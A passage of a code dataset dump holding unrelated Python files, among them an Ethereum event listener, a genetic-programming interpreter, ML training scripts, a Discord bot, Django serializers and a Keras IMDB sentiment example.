fill=X)\n\n\nroot.mainloop()","sub_path":"GUI/tkinter/MiniProjects/Toolbar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"81225408","text":"#!/usr/bin/env python3\n\n# This is a sample client for Lighthouse's events endpoint that gathers\n# block rewards, sends them to an instance of the classifier API and prints the results\n# in real time.\n\nimport json\nimport requests\nimport sseclient\n\n\nEVENT_URL = \"http://localhost:5052/eth/v1/events?topics=block_reward\"\nHEADERS = { \"Accept\": \"text/event-stream\" }\n\nCLASSIFIER_URL = \"http://localhost:8000\"\n\ndef main():\n res = requests.get(EVENT_URL, stream=True, headers=HEADERS)\n res.raise_for_status()\n\n client = sseclient.SSEClient(res)\n\n for event in client.events():\n res = requests.post(f\"{CLASSIFIER_URL}/classify\", data=event.data)\n res.raise_for_status()\n\n classification = res.json()\n print(classification)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"event_listener.py","file_name":"event_listener.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117626128","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/timesketch_api_client/story_test.py\n# Compiled at: 2020-03-13 10:57:40\n# Size of source mod 2**32: 1995 bytes\n\"\"\"Tests for the Timesketch API client\"\"\"\nfrom __future__ import unicode_literals\nimport unittest, mock\nfrom . import client\nfrom . import test_lib\nfrom . import story as story_lib\n\nclass StoryTest(unittest.TestCase):\n __doc__ = 'Test Story object.'\n\n @mock.patch('requests.Session', test_lib.mock_session)\n def setUp(self):\n \"\"\"Setup test case.\"\"\"\n self.api_client = client.TimesketchApi('http://127.0.0.1', 'test', 'test')\n self.sketch = self.api_client.get_sketch(1)\n\n def test_story(self):\n \"\"\"Test story object.\"\"\"\n story = self.sketch.list_stories()[0]\n self.assertIsInstance(story, story_lib.Story)\n self.assertEqual(story.id, 1)\n self.assertEqual(story.title, 'My First Story')\n self.assertEqual(len(story), 3)\n blocks = list(story.blocks)\n text_count = 0\n view_count = 0\n for block in blocks:\n if block.TYPE == 'text':\n text_count += 1\n elif block.TYPE == 'view':\n view_count += 1\n\n self.assertEqual(text_count, 2)\n self.assertEqual(view_count, 1)\n self.assertEqual(blocks[0].text, '# My Heading\\nWith Some Text.')\n blocks[0].move_down()\n blocks = list(story.blocks)\n self.assertEqual(len(blocks), 3)\n self.assertEqual(blocks[1].text, '# My Heading\\nWith Some Text.')","sub_path":"pycfiles/timesketch_api_client-20200319-py3.5/story_test.cpython-35.py","file_name":"story_test.cpython-35.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529772804","text":"import sys\nsys.path.append(\"/IPNeuronaleNetze\")\nsys.path.append(\"/IPNeuronaleNetze/trainers\")\nimport tensorflow as tf\nfrom models.OurModel import OurModel\nfrom Trainer import Trainer\n\n# Please enter the filepath to your dataset. \nfilepath_age = \"/IPNeuronaleNetze/data/\"\nfilepath_gender = \"/IPNeuronaleNetze/data/\"\n\ndef main():\n # This main will start the training for both, age as well as gender estimation\n # with the default amount of epochs with the value 312 and an early stopping callback with the patience of 4. \n # You can change the amount of epochs by typing \"epochs = X\" into the Trainer constructor.\n # If you want to train a model by loading the weights of an allready trained model, \n # use the load_model method from the OurModel class. \n\n # After the training is done, the models will be saved and evulation files (.csv) will be created.\n # Use the parsers to interpret the .csv files\n\n # Start training for age estimation \n AgeModel = OurModel(0)\n AgeModel = Trainer(AgeModel.model, filepath_age + \"Train\",\n filepath_age + \"Valid\", filepath_age + \"Test\",\n identifier = 0)\n AgeModel.train()\n\n # Start training for gender estimation\n GenderModel = OurModel(1)\n GenderModel = Trainer(GenderModel.model, filepath_gender + \"Train\",\n filepath_gender + \"Valid\", filepath_gender + \"Test\",\n identifier = 1)\n GenderModel.train()\n\nif __name__ == \"__main__\":\n main()","sub_path":"trainers/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305146224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 6 09:46:08 2017\n\nThis file is able to execute a Cartesian Genetic Programming program (cgp). The program can be represented by a list of\nintegers. This list representation of integers is called the solutionList or chromosome. In this list a node is\nrepresented by 3 integers. The first two integers refers to the input indices and the third integer translates to the\noperation that should be performed with the inputs.\n\nA node refers to a single operation in a cgp program. This consist of two inputs and an operation.\nThe result of is the output of the node and can be used in any successive node.\nFeatures are the input values for the entire model, this are the only inputs that the first node can use.\nInputs refer to any value that a node (single operation) can use for its computation. The possible inputs are all the\nfeatures and the result of the previous nodes. The final input list contains all the features and all the outputs of the\nnodes.\n\nInput_id refers to the location in the input list.\nNode_id refers to the location in the chromosome or translated list. (note since a node contains of node_size elements\nthis id should be multiplied by node_size)\n\nThe output are the outputs of the last #outputs (currently 2) nodes.\n\"\"\"\n\nimport math\nimport numpy as np\nnode_size = 3 # How many numbers are needed for one node. Two for the input and one to determine the operation.\noutputs = 2 # Number of outputs that should be returned.\noperations = 17 # Number of supported operations.\n\noperation_list = ['+', '-', '*', '/', 'tanh', 'cos', 'tan', 'cosh', 'PI','sqrt' , 'log' , 'e', 'pow', 'acos', 'atan', 'acosh', 'atanh','1']\n\ndef translate(nr_features, chromosome):\n \"\"\"\n Translate a list of numbers (chromosome) into an representation of a cartesian genetic program.\n :param nr_features: number of feature that will be used in the genetic program.\n :param chromosome: The solutionList, List of numbers that should be translated into a cartesian genetic program.\n :return: A list representation of a cartesian genetic program.\n \"\"\"\n nr_nodes = math.floor(len(chromosome) / node_size)\n\n translated_list= [0] * len(chromosome) # Create new list in advance (is faster than with append)\n for i in range(nr_nodes): # Turns numbers into the right numbers/operation\n # starts with 0 and can be used to determine how many outputs of nodes can be used as input.\n translated_list[node_size*i ] = chromosome[node_size*i ] % (nr_features+i) # input 1\n translated_list[node_size*i+1] = chromosome[node_size*i+1] % (nr_features+i) # input 2\n\n translated_list[node_size*i+2] = operation_list[chromosome[node_size*i+2] % operations] # operaion\n return translated_list\n\n\ndef translate_item(nr_features, item_index, item_value):\n node_index = math.floor(item_index / node_size)\n sub_index = item_index - node_size * node_index\n if sub_index == 2:\n return operation_list[item_value % operations]\n else:\n return item_value % (nr_features + node_index)\n\n\ndef cgp(features, chromosome): #function that interpretes solution in terms of features -> returns two outputs\n \"\"\"\n Functions that translates a chromosome to a cgp program and applies the features to that program. Returns the output\n of the last #outputs nodes.\n :param features: Features that should be used to calculate the result.\n :param chromosome: The solutionList, List of numbers that should be translated to a cartesian genetic program.\n :return: The output of the last #outputs nodes.\n \"\"\"\n nr_nodes = math.floor(len(chromosome) / node_size) # number of nodes in the chromosome\n nr_features = len(features)\n nr_inputs = nr_nodes + nr_features\n\n if nr_inputs < outputs:\n raise ValueError(\"Number of possible outputs is smaller than the number of desired outputs\")\n\n # Inputs is used to keep track of the input values that are already calculated (or known at the start). This list\n # makes sure the each node is evaluated at most once. When it start it only knows the values of the features.\n # During the computation the list is filled with the output of the nodes.\n inputs = [None] * nr_inputs # Create list. None means that the value is not yet known.\n for i in range(nr_features):\n inputs[i] = features[i] # Copy the features into the input list.\n\n #translated_list = translate(nr_features, chromosome) # translate the chomoso\\mne into a cgp program.\n translated_list = chromosome\n # get outputs number of outputs. The first output is the last node, the second output is the second-last node etc.\n result = []\n for i in range(1, outputs + 1):\n # Get the output of the last + 1 - i node and append it to the result list. (nr_inputs is last + 1)\n # The inputs list contains the values of all computed nodes and is used to pass these values to successive calls\n # of calculate_input\n result.append(calculate_input(translated_list, nr_inputs - i, inputs, nr_features))\n\n return result\n\n\ndef calculate_input(cgp_program, input_id, inputs, nr_features):\n \"\"\"\n Get the value for input input_id. At the end of the function, the outputs of the nodes that are evaluated are stored\n in inputs.\n :param cgp_program: A cgp program, stored as list. Is the translation of a chromosome\n :param input_id: ID of the input that must be returned. The first ids are the features [0, #features - 1] and the\n other ids are the outputs of the nodes [#features, #features + #nodes - 1]\n :param inputs: List that keeps track of all computed inputs. At the start it only contains the values for the\n inputs. Currently unknown values have the value None.\n :param nr_features: #features in inputs\n :return: the values of inputs[input_id]\n \"\"\"\n\n if inputs[input_id] is not None: # value is already known, return value\n return inputs[input_id]\n\n node_id = input_id - nr_features # inputs[input_id] is not yet known, thus is not a feature, calculate the node_id\n\n # Get the input index for the two inputs of this node.\n a_index = cgp_program[node_size*node_id]\n b_index = cgp_program[node_size*node_id+1]\n\n # Get the value of the two inputs\n a = calculate_input(cgp_program, a_index, inputs, nr_features)\n b = calculate_input(cgp_program, b_index, inputs, nr_features)\n\n # Get the operation.\n o = cgp_program[node_size * node_id + 2]\n\n # Calculate the output of this node.\n if o =='+':\n output = a+b\n elif o =='-':\n output = a-b\n elif o =='*':\n output = a*b\n else:\n if (b > 0) :\n off = 0.00001\n else:\n off = -0.00001\n output=a/(b + off) #safe division\n\n # Store the output in the inputs list.\n inputs[input_id] = output\n return output\n\n#nr_features = len(features)\n#lst=translate(nr_features, chromosome)\n#length=len(lst)\n#nrnodes=length/node_size\n#nodelist=nrnodes*[0]\n#output1ref=nrnodes-2\n#output2ref=nrnodes-1\n\n \ndef nodes_used(outputref, nodelist,lst, nr_features):\n if outputref< nr_features :\n return nodelist\n outputref-=nr_features\n #print(outputref)\n if nodelist[outputref]==1:\n return nodelist\n nodelist[outputref]=1\n #print(lst)\n inputs=[lst[node_size*(outputref)], lst[node_size*(outputref)+1]]\n #print(\"inputs\")\n #print(inputs)\n nodes_used(inputs[0],nodelist, lst)\n nodes_used(inputs[1],nodelist, lst)\n return nodelist\n \n#test\n#sol=[1,1,'*',1,1,'+', 2,2,'+', 1, 2, '*',1,4,'*',2,4,'/', 5,2,'+', 1, 1, '*'] #should result in [1,0,0,1,0,0,1,1]\n#sol=[1, 3, '-', 2, 2, '+', 1, 0, '+', 3, 1, '*', 5, 0, '-', 1, 4, '+', 5, 7, '-', 7, 4, '+', 7, 7, '-', 7, 12, '+', 13, 2, '-', 6, 12, '-', 3, 15, '-', 12, 13, '*', 17, 4, '-', 14, 12, '-', 19, 8, '*', 11, 5, '-', 12, 19, '-', 10, 5, '+']\n\n\n#nr_features=4\n\ndef createListnodes(sol, nr_features):\n #print(\"sol\")\n #print(sol)\n length=len(sol)\n nrnodes=int(length/node_size)\n nodelist=nrnodes*[0]\n output1ref=nrnodes-2\n output2ref=nrnodes-1\n onlynodes=nodes_used(output1ref+nr_features, nodelist, sol, nr_features)\n solution=nodes_used(output2ref+nr_features, onlynodes, sol, nr_features)\n #print(\"Tes\")\n #print (solution)\n #turn nodelist into list size of solution:\n newlist=nrnodes*node_size*[0]\n for i in range(nrnodes):\n if solution[i] is None:\n print ('testing')\n print (sol)\n if solution[i]==1:\n for j in range(node_size):\n newlist[node_size*i]=1\n newlist[node_size*i+j]=1\n newlist[node_size*i+j]=1 \n return newlist\n\n\ndef complete_translate(cgp_program, nr_features, nr_nodes):\n completeTranslate = (nr_features + nr_nodes) * [\"\"]\n for i in range(nr_features):\n completeTranslate[i] = \"f\" + str(i + 1) + \"\"\n\n for n in range(nr_nodes):\n base = n * node_size\n d = n + nr_features\n if (number_of_inputs(cgp_program[base + 2]) == 1) :\n completeTranslate[d] = cgp_program[base + 2] + \"(\" + completeTranslate[cgp_program[base]] + \")\"\n elif (number_of_inputs(cgp_program[base + 2]) == 0) :\n completeTranslate[d] = cgp_program[base + 2]\n else:\n completeTranslate[d] = \"(\" + completeTranslate[cgp_program[base]] + \" \" + cgp_program[base + 2] + \" \" + completeTranslate[cgp_program[base + 1]] + \")\"\n\n return completeTranslate\n\n\ndef translate_operation_to_ints(cgp_program):\n res = np.empty_like(cgp_program)\n for i in range(len(cgp_program)):\n k = cgp_program[i]\n if k == '+':\n k = 0\n if k == '-':\n k = 1\n if k == '*':\n k = 2\n if k == '/':\n k = 3\n if k == 'tanh':\n k = 4\n if k == 'cos':\n k = 5\n if k == 'tan':\n k = 6\n if k == 'cosh':\n k = 7\n if k == 'PI':\n k = 8\n if k == 'e':\n k = 9\n if k == 'pow':\n k = 10\n if k == 'acos':\n k = 11\n if k == 'atan':\n k = 12\n if k == 'acosh':\n k = 13\n if k == 'atanh':\n k = 14\n if k == 'sqrt':\n k = 15\n if k == '1':\n k = 16\n if k == 'log':\n k = 17\n res[i] = k\n return res\n\ndef number_of_inputs(k):\n if k == '+':\n return 2\n if k == '-':\n return 2\n if k == '*':\n return 2\n if k == '/':\n return 2\n if k == 'tanh':\n return 1\n if k == 'cos':\n return 1\n if k == 'tan':\n return 1\n if k == 'cosh':\n return 1\n if k == 'PI':\n return 0\n if k == 'e':\n return 0\n if k == 'pow':\n return 2\n if k == 'acos':\n return 1\n if k == 'atan':\n return 1\n if k == 'acosh':\n return 1\n if k == 'atanh':\n return 1\n if k == 'sqrt':\n return 1\n if k == '1':\n return 0\n if k == 'log':\n return 1\n return 2\n\n\n#createListnodes(sol, nr_features)\n\n \n \n\n#main program\n\n#newlist=[1,2,'+',4,0,'*']\n#features=[1,2,3,4]\n#input_id=5\n#print( calculateInput(newlist, input_id, features))\n\n \n#cgp(features, [1,2,0, 1,2,0, 4,3,2])\n\n\n","sub_path":"cgp.py","file_name":"cgp.py","file_ext":"py","file_size_in_byte":11530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"527354504","text":"# -*- coding: utf-8 -*-\r\nimport csv\r\n\r\n\"\"\"\r\nSTART_POSITION is the index of the first letter of the sequence.\r\ne.g., if START_POSITION is 1, then a sequence is numbered like this:\r\n ABCDEFG\r\n 1234567\r\nif START_POSITION is 0, then a sequence is numbered like this:\r\n ABCDEFG\r\n 0123456\r\n\"\"\"\r\nSTART_POSITION = 1\r\n\r\nsequence_infile = \"SA sequence.csv\"\r\nfragments_infile = \"csv for blast.csv\"\r\noutfile_name = \"SA sequence blast.csv\"\r\n\r\n\"\"\"\r\nEditing code below this line will affect functionality!\r\n\"\"\"\r\n\r\nsequence_string = \"\" # string to store entire sequence\r\nfragments = {} # dictionary to store the fragments\r\nfragments_size = 0 # how many fragments there are (updated as file is read)\r\nfragment_locations = {} # dictionary for start and end points of fragments\r\n\r\nprint(\"Reading files...\")\r\n\r\ntry:\r\n fragmentsfile = open(fragments_infile, 'r', newline = '')\r\nexcept IOError:\r\n print(fragments_infile + \" could not be opened. Please ensure this file exists or is not in use by another program.\")\r\n\r\nwith fragmentsfile: # open fragments_infile\r\n fragments_reader = csv.reader(fragmentsfile) # create reader object; reads fragments_infile\r\n line_number = 0 # start at first line (0)\r\n\r\n for row in fragments_reader:\r\n fragments[line_number] = row[0] # access fragment as string from csv row\r\n fragments_size += 1 # 1 fragment added\r\n line_number += 1 # 1 line read\r\n\r\ntry:\r\n sequencefile = open(sequence_infile, 'r', newline = '')\r\nexcept IOError:\r\n print(sequence_infile + \" could not be opened. Please ensure this file exists or is not in use by another program.\")\r\n\r\nwith sequencefile: # open sequence_infile\r\n sequence_reader = csv.reader(sequencefile) # create reader object; reads sequence_infile\r\n line_number = 0 # start at first line (0)\r\n\r\n for row in sequence_reader:\r\n sequence_string += row[0] # add each row to full sequence string\r\n line_number += 1 # 1 line read\r\n\r\nprint(\"Finding fragments in sequence...\")\r\n\r\nfor i in range(0, fragments_size):\r\n fragment_locations[fragments[i]] = [] # create new location list for fragment\r\n \r\n # find each fragment instance in sequence\r\n res = [j for j in range(len(sequence_string)) if sequence_string.startswith(fragments[i], j)]\r\n \r\n for j in range(len(res)):\r\n # create string with start and end position of fragment; add to dictionary\r\n fragment_locations[fragments[i]] += [str(START_POSITION + res[j]) + \", \" + str(START_POSITION + res[j] + (len(fragments[i]) - 1))]\r\n\r\nprint(\"Writing to output file...\")\r\n\r\ntry:\r\n outfile = open(outfile_name, 'w', newline = '')\r\nexcept IOError:\r\n print(outfile_name + \" could not be opened. Please ensure this file is not in use by another program.\")\r\n\r\nwith outfile: # create/open output file\r\n writer = csv.writer(outfile, delimiter=',') # create writer object; writes fragment locations\r\n writer.writerow([\"Fragment\"] + [\"# of Occurences\"] + [\"Start, End\"]) # creates 2 headers\r\n\r\n for i in range(0, fragments_size):\r\n # populates rows with fragment title + # occurences + locations\r\n writer.writerow([fragments[i]] + [len(fragment_locations[fragments[i]])] + fragment_locations[fragments[i]])\r\n\r\nprint(\"Complete! Output file: \" + outfile_name)","sub_path":"find fragment.py","file_name":"find fragment.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329976478","text":"# -*- coding:utf-8 -*-\n# Author : ebbyzhang\n'''\ngenerator 只有在调用时才生成相应的数据\n不能索引某一个值,切片,截断\n可以节约空间\n只能一个个往后生成,提取,不能够往前,一般用于循环\n通过yield 可以实现并行计算\n'''\ndef fun(sum):\n return sum*2\n\na = (fun(i) for i in range(1000000))\n\n# for i in a:\n# print(i)\n\ndef fib(max):\n n,a,b=0,0,1\n while n bool:\n if not nums:\n return False\n if len(nums) == 1:\n return True\n\n flag = False\n jump_count = nums[0]\n for index, num in enumerate(nums[:-1]):\n if jump_count <= 0 and num <= 0:\n break\n\n if len(nums)-1-index <= num:\n flag = True\n break\n\n if num > jump_count:\n jump_count = num\n\n jump_count -= 1\n\n return flag\n\n\nif __name__ == '__main__':\n S = Solution()\n nums = [5, 4, 0, 2, 0, 1, 0, 1, 0]\n flag = S.canJump(nums)\n print(flag)\n","sub_path":"src/Algorithms/55跳跃游戏/55.py","file_name":"55.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16300806","text":"import numpy as np\n\nimport os\nimport sys\nimport math\n\nfrom datetime import datetime\nfrom importlib import reload\nfrom pprint import pprint\n\nfrom platform import python_version\nprint(python_version())\n\nsys.path.append(os.getcwd())\n\nimport NDN3.NDNutils as NDNutils\nimport NDN3.NDN as NDN\n\nimport utils.data as udata\nimport utils.network as unet\nimport utils.analysis as uas\nimport utils.analysis_present as uasp\n\nimport fire\n\ndef runner(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing):\n run_1(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing)\n\n#\n# Slightly changed version of bs4_exp7: based on what/where paper (6942 Neural system identification for large populations separating “what” and “where”\n# - experiment with last layer reg.: l1 vs l2, smaller values\n# - experiment with higher cdx on conv filters\n# - experiment with different spacing (1, 2, 3::half of filter size)\n# - experiment with different 2nd and 3rd conv layer size.\ndef run_1(exp_folder, exp, run, cd2x, conv_reg_type, conv_reg_str, last_type, last_str, c_filters, secondary_conv_size, spacing):\n name = f'baseline4_whatwhere_Cd2x{cd2x}x{conv_reg_type}{conv_reg_str}_filtx{last_type}{last_str}_convsize{c_filters}_second_conv_s{secondary_conv_size}_spac{spacing}_x5000'\n exp = f\"{exp}x{run}\"\n\n def get_hsm_params_custom(input, output, i):\n _, output_shape = output.shape\n _, input_shape = input.shape\n pprint(f\"in: {input_shape} out: {output_shape}\")\n\n intput_w, input_h = int(math.sqrt(input_shape)), int(math.sqrt(input_shape))\n hsm_params = NDNutils.ffnetwork_params(\n verbose=False,\n input_dims=[1, intput_w, input_h], \n layer_sizes=[c_filters, c_filters, c_filters, output_shape], # paper: 9, 0.2*output_shape\n ei_layers=[None, None, None, None],\n normalization=[0, 0, 0, 0], \n layer_types=['conv','conv','conv','sep'],\n act_funcs=['softplus', 'softplus', 'softplus','softplus'],\n \n shift_spacing=[\n spacing if spacing > 0 else 13 // 2,\n spacing if spacing > 0 else secondary_conv_size // 2,\n spacing if spacing > 0 else secondary_conv_size // 2,0],\n conv_filter_widths=[13,secondary_conv_size,secondary_conv_size, 0],\n\n reg_list={\n 'd2x': [cd2x, cd2x, cd2x, None],\n conv_reg_type: [conv_reg_str, conv_reg_str, conv_reg_str, None],\n last_type: [None, None, None, last_str]\n })\n hsm_params['weights_initializers']=['normal','normal','normal', 'normal']\n hsm_params['biases_initializers']=['trunc_normal','trunc_normal','trunc_normal','trunc_normal']\n\n return hsm_params\n\n def get_training_params():\n epochs = 5000\n return {'batch_size': 16, 'use_gpu': False, 'epochs_summary': epochs//50, 'epochs_training': epochs, 'learning_rate': 0.001}\n\n input_tr_processed, output_tr, output_tr_mask = udata.load_data_multiple(\n [1], 'training', udata.normalize_mean_std)\n input_val_processed, output_val, output_val_mask = udata.load_data_multiple(\n [1], 'validation', udata.normalize_mean_std)\n\n for i in range(10):\n seed = i\n\n hsm_params = get_hsm_params_custom(input_tr_processed, output_tr, i)\n pprint(hsm_params)\n hsm, input_tuple = unet.get_network(\n input_tr_processed, output_tr,\n 'adam', \n get_training_params(),\n hsm_params,\n 'poisson',\n input_val_processed, output_val,\n output_tr_mask, output_val_mask,\n f\"{name}__{i}\", seed,\n\n )\n hsm.log_correlation = 'zero-NaNs'\n\n (input, output, train_indxs, test_indxs, data_filters, larg, opt_params, name_str) = input_tuple\n hsm.train(\n input_data=input, \n output_data=output, \n train_indxs=train_indxs, \n test_indxs=test_indxs, \n data_filters=data_filters,\n learning_alg=larg, \n opt_params=opt_params, \n output_dir=f\"training_data/logs/{exp_folder}/{exp}/{name_str}\" \n )\n res, naeval, corr = uasp.evaluate_all(hsm, input_val_processed, output_val, output_val_mask)\n hsm.save_model(f\"./training_data/models/{exp_folder}/{exp}/{name}__{i}.ndnmod\")\n with open(\"./training_data/experiments.txt\", \"a+\") as f:\n f.write(f\"{exp_folder}/{exp}/{name}\\n\")\n\nif __name__ == \"__main__\":\n fire.Fire(runner)\n","sub_path":"experiments/experiments_3/bs4_exp8.py","file_name":"bs4_exp8.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184920668","text":"__author__ = 'Nathan'\n\nfrom flask import g\nfrom entityframework.dbtypes import Operation\nfrom codeutils.misc import camelcase_to_sentence, camelcase_to_underscore, \\\n first_type\nfrom entityframework.templates import lookup, add_directory\n\nadd_directory(__name__)\nform = lookup.get_template(\"form.html\")\n\ndef form_template(form_config, action_url, **kwargs):\n \"\"\"\n Handles basic form template field processing.\n \"\"\"\n class_ = kwargs[\"class_\"] = first_type(form_config.model)\n class_name = kwargs[\"class_name\"] = class_.__name__\n kwargs[\"title\"] = camelcase_to_sentence(class_name)\n kwargs[\"type_\"] = camelcase_to_underscore(class_name)\n if not isinstance(form_config.model, type):\n submit_type = kwargs[\"submit_type\"] = \"Update\"\n else:\n submit_type = kwargs[\"submit_type\"] = \"Create\"\n operations = kwargs[\"operations\"] = getattr(g, \"operations\", [])\n if not (\"Update\" in operations or submit_type == \"Create\"):\n form_config.disabled()\n kwargs[\"rendered_fields\"] = form_config.render()\n kwargs[\"form_name\"] = class_name + submit_type\n if submit_type == \"Create\":\n kwargs[\"render_create\"] = True\n elif submit_type == \"Update\":\n if \"Update\" in operations:\n kwargs[\"render_update\"] = True\n if \"Update\" in operations:\n kwargs[\"render_delete\"] = True\n kwargs[\"action_url\"] = action_url\n return form.render(**kwargs)\n","sub_path":"entityframework_form/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444162673","text":"from discord.ext import commands\nimport os\nimport keep_alive\nimport discord\n#from threading import Thread\n\n#def input_thread\n\nstart_time = time.time()\n\nkeep_alive.keep_alive()\n\nbot = commands.Bot(\n command_prefix='!',\n description='an apex tracker bot by tomate_boi#7518',\n owner_id=374886124126208000,\n case_insensitive=True\n)\n\ncogs = ['cogs.apex', 'cogs.general']\n\n@bot.event\nasync def on_ready():\n print(f'logged in as {bot.user.name}/{bot.user.id}')\n\n for cog in cogs:\n bot.load_extension(cog)\n return\n\nprint('starting bot...')\n\n\nbot.run(os.environ['SECRET'], bot=True, reconnect=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117443883","text":"\"\"\"\nParameters\nDefine the following set of parameters :\n * grid parameters\n\"\"\"\n\nfrom numpy import array\nfrom collections import namedtuple\n\n\n# Model grid parameters\ngrid_min = array([0., 0., 0.])\ngrid_max = array([15., 15., 100.])\ngrid_resolution = array([5, 5, 25])\ngrid_nb_nodes = grid_resolution[0] * grid_resolution[1] * grid_resolution[2]\ngrid_fixed_box = array([0., 0., 0., 15., 15., 0.])\ngrid = {'min': grid_min,\n 'max': grid_max,\n 'res': grid_resolution,\n 'size': grid_min.tolist() + grid_max.tolist(),\n 'nb_nodes': grid_nb_nodes,\n 'fixed_box': grid_fixed_box}\np_grid = namedtuple('p_grid', grid)(**grid)\n","sub_path":"examples/demos/Beam/UNet/Environment/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544786852","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\n\nfrom accounts.api.serializer import UserSerializer\nfrom client.models import Profile, Client\nfrom project.models import Project\nfrom address.serializers import AddressSerializer\nfrom address.models import Address\n\nUser = get_user_model()\n\nclass ProfileSerializer(serializers.ModelSerializer):\n\n address = AddressSerializer()\n user = UserSerializer()\n\n class Meta:\n model = Profile\n fields = ('id', 'user', 'image', 'birth_date', 'is_support', 'is_manager', 'is_admin', 'address',)\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n address_data = validated_data.pop('address')\n address = Address.objects.create(**address_data)\n\n profile = Profile(**validated_data)\n profile.address = address\n profile.save()\n\n return profile\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n\n address = AddressSerializer()\n user = UserSerializer()\n\n class Meta:\n model = Profile\n fields = ('id', 'user', 'image', 'birth_date', 'address')\n read_only_fields = ('id',)\n\n def update(self, instance, validated_data):\n address = instance.address\n address_data = validated_data.get('address')\n address.street = address_data.get('street', address.street)\n address.complement = address_data.get('complement', address.complement)\n address.post_code = address_data.get('post_code', address.post_code)\n address.city = address_data.get('city', address.city)\n address.state = address_data.get('state', address.state)\n address.country = address_data.get('country', address.country)\n address.save()\n\n instance.image = validated_data.get('image', instance.image)\n instance.birth_date = validated_data.get('birth_date', instance.birth_date)\n instance.address = address\n instance.save()\n\n return instance\n\n\nclass ClientSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Client\n fields = ('id', 'user', 'company')\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n client = Client.objects.create(**validated_data)\n return client\n\n\nclass ClientListSerializer(serializers.ModelSerializer):\n\n user = UserSerializer()\n\n class Meta:\n model = Client\n fields = ('id', 'user', 'company', 'products')\n read_only_fields = ('id','info',)\n\nclass ClientDetailSerializer(serializers.ModelSerializer):\n\n supported_projects = serializers.PrimaryKeyRelatedField(many=True, queryset=Project.objects.all())\n user = UserSerializer()\n\n class Meta:\n model = Client\n\n fields = ('id', 'company', 'supported_projects', 'user')\n\n def update(self, instance, validated_data):\n user = User.objects.get(pk=validated_data.get('user'))\n instance.user = user\n instance.email = user.email\n instance.company = validated_data.get('company')\n instance.save()\n return instance\n\n","sub_path":"product/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"115779648","text":"from keras.datasets import imdb\nfrom keras import models, regularizers\nfrom keras import layers\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Take only the top 10000 most frequently occurring words.\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n\n\ndef explore():\n print(train_data.shape)\n print(train_labels.shape)\n\n print(test_data.shape)\n print(test_labels.shape)\n\n print(train_data[0])\n print(train_labels[0])\n\n print(max(max(sequence) for sequence in train_data))\n\n # word_index is a dictionary mapping: word -> int indices\n word_index = imdb.get_word_index()\n # reversing it, mapping becomes int indices -> word\n reversed_word_index = dict([(value, key) for (key, value) in word_index.items()])\n decoded_review = ' '.join(reversed_word_index.get(i-3, '?') for i in train_data[0])\n print(decoded_review)\n\n\nexplore()\n\n\"\"\"Encoding the integer sequence into a binary matrix\"\"\"\n\n\ndef vectorise_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n # print(results)\n # print(sequences)\n # print(enumerate(sequences))\n for i, sequence in enumerate(sequences):\n # print(i, sequence)\n results[i, sequence] = 1.\n return results\n\n\n# Vectorise features\nx_train = vectorise_sequences(train_data)\nx_test = vectorise_sequences(test_data)\nprint(x_train[0])\nprint(x_train[0].shape)\n\n\n# Vectorise labels\ny_train = np.asarray(train_labels).astype('float32')\ny_test = np.asarray(test_labels).astype('float32')\n\nprint(y_train[0])\nprint(y_train[0].shape)\n\n\"\"\" The input data are vectors and the labels are scalars (1s and 0s). The network\n we choose is a simple stack of Dense layers with `relu` activation\n ====================\n NETWORK ARCHITECTURE\n ====================\n - Two intermediate layers with 16 hidden units each (activation = 'relu')\n To zero out the negative values\n - A third layer that will be the output the scalar prediction(sentiment of the current review)\n (activation = 'sigmoid') To output the score between 0 and 1 (how likely is the review positive)\n\"\"\"\n\n\ndef get_original_model():\n model = models.Sequential()\n model.add(layers.Dense(16, 